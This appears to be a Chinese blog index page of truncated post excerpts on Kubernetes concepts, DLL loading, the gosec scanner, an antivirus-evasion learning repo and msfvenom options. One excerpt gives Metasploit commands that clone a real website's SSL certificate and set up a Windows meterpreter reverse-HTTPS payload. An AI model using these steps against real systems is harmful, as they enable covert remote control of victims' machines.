具体参考 TSY244/AByPassAvLearnCpp (github.com)

预备知识 线程是不能被“杀掉”、“挂起”、“恢复”的，线程在执行的时候自己占据着CPU，别人不能控制它 举个极端的例子：如果不调用API，屏蔽中断，并保证代码不出现异常，线程将永久占用CPU 所以说线程如果想“死”，一定是自己执行代码把自己杀死，不存在“他杀”的情况 那么将会产生一个问题 如果想改变一个线程的行为该怎么做呢？ 既然只能让他自己杀死自己，那我们就递出那一把刀。 让他主动调用一

简介cpp 加载dll 可以分为在编译的时候进行加载或者是在执行代码的时候进行动态加载 编译加载dll 的制作制作一个class static 的函数的dll，然后在编译的时候链接，但是这样如果dll 数量过多，只要有一个dll 不存在，整个程序都会报错 12345678910111213141516171819cmake_minimum_required(VERSION 3.29) proje

集群级别的资源作用于集群之上，集群下的所有资源都可以共享 namespace一个集群中的概念，可以简单理解为使用命名空间(namespace)，在集群内划分出了很多不同的小的集群 在同一个命名空间中的资源是可以相互访问的，但是不同的命名空间中的是拒绝访问

对象和资源Kubernetes中的所有内容都被抽象为”资源”，如Pod、Service、Node等都是资源。“对象“就是”资源”的实何，是持久化的实体。如某个具体的Pod、某个具体的Node。Kubernetes使用这些实体去表示整个集群的状态。对象的创建、除、修改都是通过”Kubernetes API”,也就是”Api Server”组件提供的API接口，这些是RESTful风格的Api，与k8

masterapi-server一个基于rest 风格的接口，用于操作k8s controller-manager控制器管理器 管理各个类型的控制器 针对k8s 中的各种资源进行管理 cloud-controller-manager云控制器管理器 用于第三方云平台的api 对接的管理器 kube-scheduler调度器 负责将pod 基于一定算法，将其调度到合适的节点（服务器）上 etcdk8

代码审计工具 gosec 1https://github.com/securego/gosec 简单的使用方法 直接输出内容到终端 1gosec -fmt=json ./...` 支持的格式有：`text, json, yaml, csv, sonarqube, JUnit XML, html 输出到指定文件 1`gosec -fmt=json -out=results.json ./

msfvenom部分参数解读1234567891011121314151617181920212223242526272829303132333435363738-p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的-l, –list [module_type] 列出指定模块的所有可用资源. 模块类型

制作证书进入 msfconsole 123use auxiliary/gather/impersonate_sslset rhosts www.4399.comrun 记录证书的位置cert_4399.pem 生成payload123456use payload/windows/x64/meterpreter_reverse_httpsset stagerverifysslcert 1set

参考 Ingress | Kubernetes Kubernetes K8S之Ingress详解与示例-腾讯云开发者社区-腾讯云 (tencent.com)